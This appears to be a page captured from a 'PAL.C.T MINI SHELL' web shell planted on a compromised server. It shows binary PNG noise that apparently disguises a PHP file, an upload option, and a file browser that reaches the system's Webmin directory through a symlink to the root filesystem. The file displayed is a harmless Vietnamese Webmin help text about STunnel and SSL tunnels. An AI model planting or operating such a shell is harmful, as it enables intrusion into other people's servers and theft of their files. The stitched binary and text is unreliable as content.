php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/libexec/webmin/stunnel/help/
upload
files >> /var/www/html/sub/images/sym/root/usr/libexec/webmin/stunnel/help/intro.vi.auto.html

<header> Giới thiệu về Đường hầm SSL </header> SSL là một giao thức để mã hóa dữ liệu trong kết nối TCP khi nó truyền qua mạng. Ban đầu nó được phát triển để bảo vệ lưu lượng giữa các trình duyệt web và máy chủ, nhưng có thể được sử dụng để mã hóa bất kỳ loại luồng dữ liệu nào thường được gửi qua giao thức TCP. <p> Giao thức SSL cho phép máy khách và máy chủ tự xác thực lẫn nhau, để khách hàng có thể chắc chắn rằng nó thực sự đang kết nối với máy chủ mà nó nghĩ là như vậy. Điều này được thực hiện bằng cách sử dụng các chứng chỉ được cấp bởi cơ quan chứng nhận được khách hàng công nhận (để có thể xác minh chúng) và được liên kết với một tên máy chủ cụ thể. Nếu không có chứng chỉ, kẻ tấn công có thể chuyển hướng kết nối SSL đến máy chủ của chính mình và nắm bắt thông tin nhạy cảm từ một khách hàng cho rằng nó đang nói chuyện với máy chủ thực. <p> Bất kỳ dữ liệu nào đi qua Internet không được mã hóa đều có thể bị bắt và đọc bởi kẻ tấn công có quyền truy cập vào một trong các mạng mà nó đi qua. Ngay cả dữ liệu di chuyển giữa máy khách và hệ thống máy chủ trên mạng LAN cũng có thể dễ dàng lắng nghe. Khi bạn kết nối với máy chủ telnet, FTP hoặc POP3, mật khẩu của bạn sẽ được gửi qua mạng và do đó kẻ tấn công có thể bị bắt. <p> SSL có thể được sử dụng để bảo vệ dữ liệu trong các loại tình huống này, nhưng chỉ khi cả máy khách và máy chủ hỗ trợ nó. Hầu hết các trình duyệt web và ứng dụng thư khách có thể tạo các kết nối HTTP, POP3 và IMAP được mã hóa SSL, nhưng không phải tất cả các máy chủ web và POP3 đều có thể chấp nhận chúng. Nói riêng, POP3 rất khó bảo vệ, vì máy chủ tiêu chuẩn đi kèm với hầu hết các hệ thống Unix hoàn toàn không hỗ trợ SSL. May mắn thay mặc dù có một giải pháp - STunnel. <p> STunnel là một chương trình đơn giản chuyển đổi kết nối không được mã hóa thành kết nối được mã hóa SSL. Nó thường được thiết lập để được chạy từ một siêu máy chủ như inetd hoặc xinetd, sau đó chạy một số chương trình khác như máy chủ POP3 không hỗ trợ SSL. Thiết kế này cho phép nó bảo vệ bất kỳ máy chủ nào thường chạy từ inetd, chẳng hạn như máy chủ telnet, NNTP và IMAP. <p> Tuy nhiên, không phải tất cả các máy chủ đều có thể được bảo vệ một cách hữu ích bằng mã hóa, bởi vì không có máy khách nào tồn tại để sử dụng chúng trong chế độ SSL. Ví dụ, tôi chưa bao giờ nghe nói về một máy khách telnet hoặc FTP có thể sử dụng SSL, bởi vì gói SSH thông thường đã cho phép đăng nhập từ xa được mã hóa và truyền tệp. <p> Mô-đun Webmin này giúp dễ dàng thiết lập các dịch vụ siêu máy chủ chạy STunnel để khởi động một số chương trình máy chủ. Mặc dù điều này có thể được thực hiện thủ công bằng mô-đun Dịch vụ Internet, nhưng điều này được thiết kế đặc biệt để thiết lập và định cấu hình STunnel. Nó tự động phát hiện nếu bạn đã cài đặt inetd và / hoặc xinetd, đọc cấu hình của chúng để kiểm tra các đường hầm SSL hiện có và thêm chúng khi bạn tạo một đường hầm mới. Nếu cả hai được cài đặt, các đường hầm SSL mới sẽ được thêm vào cấu hình xinetd vì theo ý kiến của tôi, đó là ưu thế của cả hai. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`